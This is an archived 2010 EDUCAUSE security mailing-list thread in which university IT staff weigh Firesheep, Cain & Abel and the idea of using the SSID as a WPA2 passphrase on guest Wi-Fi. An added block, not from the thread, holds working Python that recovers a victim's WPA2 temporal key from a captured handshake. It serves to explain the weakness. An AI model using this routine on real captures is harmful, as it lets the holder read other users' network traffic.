Educause Security Discussion mailing list archives
Re: Firesheep/Cain& Able
From: Matt Giannetto <MGiannetto () MC3 EDU>
Date: Wed, 3 Nov 2010 14:42:32 -0400
...and the false sense of security. I'm struggling with this as well, as one of my network admins suggested this. Technically it limits the effect of Firesheep alone, but to me it seems like fixing the threat and not the vulnerability. Nothing stops someone from using Cain & Abel once they connect to the password-protected network. Sure, it's better than being wide open, but telling someone "we did it to protect from Firesheep" when it only kinda protects from Firesheep in certain situations is hard to message properly and leaves users exposed. It's a false sense of security. And it could be useless against the next attack tool, leaving us to explain to our users, "Well, the password works for 'Firesheep', but it doesn't really help with 'Firegoat', so now you have to be careful on password-protected public networks...". Again -- hard to message.

Which brings up the question: how would we educate users to distinguish a password-protected public wireless network from a trusted wireless network? Users have a clear understanding of what a public, untrusted network is (well, in general), but throwing a password on it muddies the water.

Another question -- if you password-protect your public wireless by using the SSID as the password because it's "more secure", are your users going to incorrectly think that's sufficient for their home networks?

One of the worst parts of this solution is that once you put a password on it to thwart Firesheep now, it's hard to go back after its hype and popularity dies down. I'm not saying it's a bad solution as much as I'm saying it's a dangerous solution. Unfortunately, telling users that they shouldn't use social networking sites on public Wi-Fi is as well, because it's (arguably) unreasonable/no one listens.
Thanks,
Matt Giannetto
Director of IT Security
Montgomery County Community College
mgiannetto () mc3 edu | (215) 619-7442

-----Original Message-----
From: John Ladwig [mailto:John.Ladwig () CSU MNSCU EDU]
Sent: Monday, November 01, 2010 10:55 AM
Subject: Re: Firesheep/Cain& Able

I'm wrestling again with the wisdom of turning WPA2-PSK on for all currently-unencrypted captive-portal type WLANs, using the SSID as the PSK, in order to get radio-side client-client isolation. There's just that nagging question of user experience, and helpdesk calls...

-jml

-----Original Message-----
From: Hudson, Edward
Sent: 2010-11-01 09:41:33
To: Hudson, Edward; The EDUCAUSE Security Constituent Group Listserv
Cc:
Subject: [SECURITY] Firesheep/Cain& Able

In light of the recent attention to "Firesheep" I am wondering if anyone is having issues and how they are addressing? When used in conjunction with "Cain&Able" it appears able to sniff both wired and wireless traffic for login credentials and execute ARP Poisoning.

TIA
EH

Ed Hudson, CISM
Information Security Office
California State University, Chico
www.csuchico.edu/ires/security
Office: (530) 898-6307
Cell: 707-799-3250
ewhudson () csuchico edu

Montgomery County Community College is proud to be the #1 ranked technology-savvy community college in the nation, as determined by the Center for Digital Education and Converge magazine.
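The thread's concern that a WPA2-PSK whose passphrase is the SSID only "kinda" protects against a sniffer can be made concrete. The following is an added example, not code from any participant in this thread: it simulates, with constructed MAC addresses and nonces, a legitimate client deriving its WPA2 pairwise keys from the shared PSK and signing handshake message 2, and then a passive attacker who knows that same PSK (it is the SSID) recomputing the victim's PTK from the captured 4-way handshake and confirming it against the message MIC. The resulting temporal key (TK) is what decrypts the victim's CCMP data frames, so radio-side client isolation does not stop an eavesdropper who already holds the passphrase; this is the same derivation Wireshark performs when given a PSK and a captured handshake. Only the standard library is used; the SSID "CampusGuest", the MACs and the nonces are assumptions made for the example.

```python
"""Why a PSK everyone knows (here: the SSID itself) gives no confidentiality
between clients: anyone holding the passphrase who captures a victim's 4-way
handshake can recompute the victim's pairwise keys offline.  Stdlib only."""
import hashlib
import hmac

MIC_OFFSET = 81  # EAPOL header (4) + RSN key descriptor fields before the MIC (77)


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Passphrase-to-PMK mapping: PBKDF2-HMAC-SHA1, 4096 iterations, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa2_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK for CCMP (PRF-384) from PMK, AP MAC, client MAC and both nonces: KCK | KEK | TK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


def build_msg2(snonce: bytes) -> bytes:
    """Skeleton of handshake message 2 (EAPOL-Key, RSN descriptor type 2, MIC zeroed)."""
    key_info = 0x010A  # descriptor version 2 (HMAC-SHA1-128), pairwise, MIC bit set
    body = (bytes([2]) + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big")
            + (1).to_bytes(8, "big") + snonce + bytes(16) + bytes(8) + bytes(8)
            + bytes(16) + bytes(2))
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body  # EAPOL v2, type Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for descriptor version 2: HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def client_send_msg2(passphrase, ssid, aa, spa, anonce, snonce):
    """Legitimate client: derive the PTK from the PSK and sign message 2 with the KCK."""
    ptk = wpa2_ptk(wpa2_pmk(passphrase, ssid), aa, spa, anonce, snonce)
    frame = build_msg2(snonce)
    signed = frame[:MIC_OFFSET] + eapol_mic(ptk["kck"], frame) + frame[MIC_OFFSET + 16:]
    return signed, ptk["tk"]


def attacker_recover_tk(guess, ssid, aa, spa, anonce, snonce, msg2):
    """Passive attacker: recompute the PTK from the PSK and the captured handshake;
    a matching MIC on message 2 confirms the key, and the TK decrypts the victim's CCMP frames."""
    ptk = wpa2_ptk(wpa2_pmk(guess, ssid), aa, spa, anonce, snonce)
    if hmac.compare_digest(eapol_mic(ptk["kck"], msg2), msg2[MIC_OFFSET:MIC_OFFSET + 16]):
        return ptk["tk"]
    return None


def demo() -> dict:
    ssid = "CampusGuest"                        # constructed SSID (assumption)
    psk = ssid                                  # the proposal under discussion: SSID doubles as the PSK
    aa = bytes.fromhex("001122334455")          # constructed AP MAC
    spa = bytes.fromhex("66778899aabb")         # constructed victim MAC
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))  # constructed nonces
    msg2, victim_tk = client_send_msg2(psk, ssid, aa, spa, anonce, snonce)
    return {
        "victim_tk": victim_tk,
        "attacker_tk": attacker_recover_tk(psk, ssid, aa, spa, anonce, snonce, msg2),
        "wrong_psk": attacker_recover_tk("not-the-ssid", ssid, aa, spa, anonce, snonce, msg2),
    }


if __name__ == "__main__":
    r = demo()
    print("victim TK  :", r["victim_tk"].hex())
    print("attacker TK:", r["attacker_tk"].hex(), "(same key -> victim's traffic is readable)")
    print("wrong PSK  :", r["wrong_psk"])
```

Everything the attacker needs (both MACs, both nonces, and the MIC on message 2) is transmitted in the clear during association, so the only secret in the derivation is the passphrase; once that is the SSID, per-client encryption reduces to a formality against another user of the same network.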
Current thread:
- Re: Firesheep/Cain& Able, (continued)
- Re: Firesheep/Cain& Able Michael Horne (Nov 01)
- Re: Firesheep/Cain& Able Isac Balder (Nov 01)
- Re: Firesheep/Cain& Able Valdis Kletnieks (Nov 01)
- Re: Firesheep/Cain& Able David Gillett (Nov 03)
- Re: Firesheep/Cain& Able Foerst, Daniel P. (Nov 02)
- Re: Firesheep/Cain& Able Webb, Justin (Nov 02)
- Re: Firesheep/Cain& Able Greg Williams (Nov 02)
- Re: Firesheep/Cain& Able Alex Keller (Nov 02)
- Re: Firesheep/Cain& Able Valdis Kletnieks (Nov 01)
- Re: Firesheep/Cain& Able John Ladwig (Nov 01)
- Re: Firesheep/Cain& Able John Ladwig (Nov 02)
- Re: Firesheep/Cain& Able Matt Giannetto (Nov 03)